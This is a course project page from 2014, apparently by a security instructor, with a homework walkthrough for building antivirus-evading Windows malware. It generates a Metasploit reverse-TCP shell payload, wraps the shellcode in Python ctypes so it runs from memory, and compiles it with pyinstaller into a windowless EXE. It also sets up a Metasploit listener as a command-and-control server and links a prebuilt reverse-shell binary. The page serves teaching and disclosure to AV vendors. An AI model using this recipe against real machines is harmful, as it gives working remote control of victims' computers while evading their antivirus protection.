Antivirus Challenge: Detect This Malware

Update 7-8-14: Evil.exe v. Norton

Here's a simple demonstration of the weakness of AV software: EVIL.EXE Python keylogger.

No AV product detects it at all. When I demonstrated it in Baltimore on 6-24-14, it seemed like Norton detected it, but I just tested it again today (7-8-14) and it was not detected, as shown below:

New 4-28-14: LastLine Detects It!

@ChrisAbdalla_1 tested this sample with LastLine and it detected it correctly as a Metasploit reverse shell:

Violent Python

I am using a simple antivirus evasion technique from the book

Violent Python

Compiled malicious code is stored as data on the disk and loaded into RAM with this Python command:

cast(memory1, CFUNCTYPE(c_void_p))
The Python code is then compiled to an EXE file. That seems to defeat all antivirus engines I can test. So far I have tested Norton, Nod32, Avast, 360 Internet Security, and Kaspersky, as well as using VirusTotal:

http://samsclass.info/124/proj14/norton.htm

Malicious EXE File

This binary file, when executed on a Windows target, causes it to connect back to a Metasploit listener at the IP address 192.168.1.89

rsh-192-168-1-89.exe

It's a 3 MB file. Normally I zip malware with a password but since no anti-malware product can detect this one there is at present no reason to bother.

How to Make Your Own Undetectable Malware

This is the project my students do for homework.

What You Need

Purpose

Make a reverse TCP shell exploit with Metasploit, compile it into a Windows executable, and use it to control a Windows target with Norton Antivirus running.

This is a strong demonstration of the weak protection afforded by antivirus.

Networking

Start both your Windows target and your Kali Linux attacker. Make sure you can ping the Kali Linux box from the Windows box. If you want to attack a Windows 7 host running the Kali Linux as a virtual machine, use Bridged networking mode.

Generating Malicious Code with Metasploit

In Kali Linux, in a Terminal, execute this command:

ifconfig
Make a note of your Kali Linux box's IP address.

In Kali Linux, in a Terminal, execute these commands, replacing the IP address with the IP address of your Kali Linux box, and "YOURNAME" with your own name (without spaces).

msfpayload windows/shell/reverse_tcp LHOST=192.168.119.132 C > YOURNAME-rsh.py

nano YOURNAME-rsh.py

The file opens in nano, as shown below.

This code is written in C, not in Python, so some additional lines are needed.

Add this line to the top of the file:

from ctypes import *
That imports the library code needed to run a C program from Python.

Remove all the comment lines. TIP: in nano, Ctrl+K deletes a line.

Remove this line:

unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
stage1code = (
Your screen should now look like this:

In nano, use the down-arrow key to find the end of the first block of green hexadecimal codes, as shown below:

Add a closing parenthesis before the semicolon at the end of the first block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory1 = create_string_buffer(stage1code, len(stage1code))

stage1 = cast(memory1, CFUNCTYPE(c_void_p))

stage1()

Your screen should now look like this:

Below the lines you just added, remove all the comment lines.

Remove this line:

unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
stage2code = (
Your screen should now look like this:

In nano, use the down-arrow key to move to the end of the file.

Add a closing parenthesis before the semicolon at the end of the block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory2 = create_string_buffer(stage2code, len(stage2code))

stage2 = cast(memory2, CFUNCTYPE(c_void_p))

stage2()

Your screen should now look like this:

Save the file with Ctrl+X, Y, Enter.

In Kali Linux, in a Terminal, execute this command to copy the file to your Kali desktop:

cp YOURNAME-rsh.py ~/Desktop

Moving the File to your Windows Machine

In Kali Linux, minimize all windows.

Drag the YOURNAME-rsh.py file from the Kali Linux desktop to the desktop of your host system.

If you are not attacking the host, move the file from the desktop of the host system to your target system.

You could also move the file by emailing it.

Starting a Metasploit Listener

Your Kali machine will serve as the Command & Control server for the Windows bot. Therefore it must be listening for bots to call in, requesting commands.

In Kali Linux, in a Terminal, execute these commands:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 0.0.0.0

set ExitOnSession false

exploit -j

The payload handler should start, like this:

Preparing your Windows Python Environment

You need Python 2.7, PyWin32, pip-Win, and pyinstaller on your Windows system, as you set it up in the two previous projects, Projects 8 and 9 here:

http://samsclass.info/124/124_S14.shtml#projects

Starting pip-Win

On your Windows machine, click Start. In the Search box, type in pip-Win.

When it finds pip-Win1.6.exe, click it.

In pip-Win1.6, in the Command field, enter

venv pyi-env-name
as shown below:


Click Run.

A command shell opens with your Python development environment.

Testing the Malware

On Windows, in the Command Prompt window, execute this command:
python YOURNAME-rsh.py
You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 1
On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Troubleshooting

Wrong Path

If python cannot find your YOURNAME-rsh.py file, you are in the wrong working directory. Use the CD command to move to the correct directory, which will be something like this:

CD \Users\Administrator\Desktop

Syntax Errors

If you see Python syntax errors on the Windows machine, there are typographical errors in your Python source code.

Open the YOURNAME-rsh.py file on Windows in Wordpad and correct them.

IP Address Errors

If the Python code runs, but no session is opened on Kali Linux, you may have made malware that connects to the wrong address. Open a new Command Prompt window on Windows and try pinging the Kali Linux machine. If the address is wrong, you will have to repeat the whole process to make new exploit code, because the address is encoded in the hexadecimal values and not simple to fix.

VMware Networking Problems

VMware machines running Kali tend to ignore SYN packets and/or send inappropriate RST packets. A simple way to prevent that is to run Wireshark sniffing.

Open a new Terminal window in Kali and execute this command:

wireshark
Start sniffing on your network adapter.

Try the exploit again.

Metasploit Listener Problems

If the session dies with an ECONNRESET error message in Metasploit, use the exit command to stop Metasploit and start the listener again. Restarting Wireshark may also help.

Stopping the Python Exploit

On Windows, close the Command Prompt window running your YOURNAME-rsh.py program.

Starting pip-Win Again

On your Windows machine, in pip-Win1.6, click Run.

A command shell opens with your Python development environment.

Compling the Malware

On Windows, in the Command Prompt window, execute this command:
pyinstaller --onefile --noconsole YOURNAME-rsh.py
This creates a file named "YOURNAME-rsh.exe" in the "dist" folder on your desktop.

Running the Malware

On your Windows desktop, double-click the dist folder.

Double-click the YOURNAME-rsh.exe file.

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 2
On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Stopping the Malware

In Windows, right-click the taskbar at the bottom of the desktop and click "Start Task manager". In Task Manager, find the two processes named YOURNAME-rsh.exe, as shown below.

On one of the two YOURNAME-rsh.exe processes, right-click it, click "End Process", and click "End Process" again.

If both "YOURNAME-rsh.exe" processes vanish, you're done. If one is still running, close it the same way.

Adding Norton Antivirus to your Windows Machine

In your Windows machine, open a Browser and go to this URL:

http://goo.gl/BPq4DN

A 30-day trial version of Norton Antivirus downloads.

Install it with the default options.

Update Norton when you are prompted to. Restart your Windows machine if you are prompted to.

When Norton is all updated and running, run its console, so you can see the green "All Threats Resolved" message, as shown below.

Then run the executable again, and establish a remote control session with Kali Linux.

See what Norton does about it. At the time I wrote this, Norton didn't do a thing, as shown below.

Sources

I am grateful for assistance from @info_dox, @NortonSupport, and @ViolentPython in developing this project.

Using meterpreter on local machine without an exploit

Violent Python

Companies Contacted

@NortonSupport in March 2014
April 3, 2014: @FireEye @kaspersky @McAfee_Labs @NortonSupport @ESET @bromium @PaloAltoNtwks @Infoblox @msftsecurity
Posted: 3-24-14 1:57 pm
Rewritten as a challenge to AV companies 4-3-14 10:43 am
List of contacted companies and link to AV tests added 10:51 am 4-3-14
LastLine results added 1:49 pm 4-28-14
Updated 7-8-14 with new Norton results